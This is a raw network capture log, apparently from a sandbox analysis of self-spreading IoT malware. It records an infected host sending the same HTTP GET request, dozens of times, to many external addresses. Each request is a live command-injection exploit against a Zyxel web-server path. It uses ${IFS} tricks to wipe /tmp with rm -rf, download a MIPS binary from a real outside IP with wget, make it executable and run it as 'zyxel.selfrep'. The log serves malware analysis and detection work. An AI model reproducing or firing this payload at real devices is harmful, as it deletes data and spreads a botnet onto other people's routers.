                                        Mar 31, 2024 09:20:43.385296106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1906192.168.2.2350458206.104.118.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385355949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1907192.168.2.2336164202.227.158.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385404110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1908192.168.2.2337134212.115.232.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385448933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1909192.168.2.2337880123.115.208.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385502100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1910192.168.2.2333654133.167.211.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385555029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1911192.168.2.2344366120.32.116.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385595083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1912192.168.2.234277046.222.235.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385629892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1913192.168.2.2342324120.203.54.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385704994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1914192.168.2.2338328123.72.43.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385747910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1915192.168.2.2334926201.141.88.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385788918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1916192.168.2.2349894207.173.251.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385831118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1917192.168.2.2341132185.119.149.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385879040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1918192.168.2.2343996146.157.34.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385943890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1919192.168.2.234803861.244.66.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385978937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1920192.168.2.235244243.120.37.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386019945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1921192.168.2.236041418.158.188.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386068106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1922192.168.2.2336380101.11.235.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386111975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1923192.168.2.2346774106.222.110.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386145115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1924192.168.2.2345628136.196.173.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386204958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1925192.168.2.2336936107.244.180.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386246920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1926192.168.2.2351248100.5.245.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386293888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1927192.168.2.235942894.33.4.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386342049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1928192.168.2.2333744129.226.84.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386390924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1929192.168.2.2358188187.32.175.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386428118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1930192.168.2.235541049.85.37.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386461973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1931192.168.2.2353924171.11.49.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386517048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1932192.168.2.2332916208.107.141.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386564016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1933192.168.2.2348602179.67.221.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386614084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1934192.168.2.2338180135.171.190.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386657953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1935192.168.2.2348234124.58.104.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386707067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1936192.168.2.2353974197.215.233.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386758089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1937192.168.2.235231086.70.4.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386809111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1938192.168.2.2343468160.35.203.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386842966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1939192.168.2.2346580149.196.150.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386904001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1940192.168.2.2348976175.206.43.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386936903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1941192.168.2.2346838131.228.135.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.386972904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1942192.168.2.2352318189.16.211.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387034893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1943192.168.2.2348080202.92.228.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387082100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1944192.168.2.2360590102.255.193.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387124062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1945192.168.2.23551149.4.120.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387166023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1946192.168.2.2356222207.114.112.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387206078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1947192.168.2.2346000141.49.142.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387257099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1948192.168.2.233618092.129.254.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387295008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1949192.168.2.2333564103.235.211.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387335062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1950192.168.2.23592565.20.35.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387381077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1951192.168.2.2333266107.209.200.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387419939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1952192.168.2.2347380169.179.112.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387449980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1953192.168.2.23502849.16.137.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387495041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1954192.168.2.235883640.33.172.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387521982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1955192.168.2.2354918141.41.236.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387578964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1956192.168.2.235278276.71.73.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387617111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1957192.168.2.236005039.77.78.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387664080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1958192.168.2.234148080.9.170.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387707949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1959192.168.2.2356532107.209.152.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387739897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1960192.168.2.2352096157.13.25.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387779951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1961192.168.2.2334350140.104.52.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387814045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1962192.168.2.233820857.67.60.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387872934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1963192.168.2.2356232187.167.212.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387916088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1964192.168.2.234719449.99.48.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.387969017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1965192.168.2.233867417.250.103.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388012886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1966192.168.2.235325288.200.51.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388062954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1967192.168.2.234607214.67.192.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388112068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1968192.168.2.2336696141.51.129.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388159990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1969192.168.2.233622698.78.173.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388206005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1970192.168.2.235864835.166.60.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388251066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1971192.168.2.234581865.89.87.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388305902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1972192.168.2.235048013.54.126.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.388340950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1973192.168.2.236092061.74.240.215443
                                        TimestampBytes transferredDirectionData
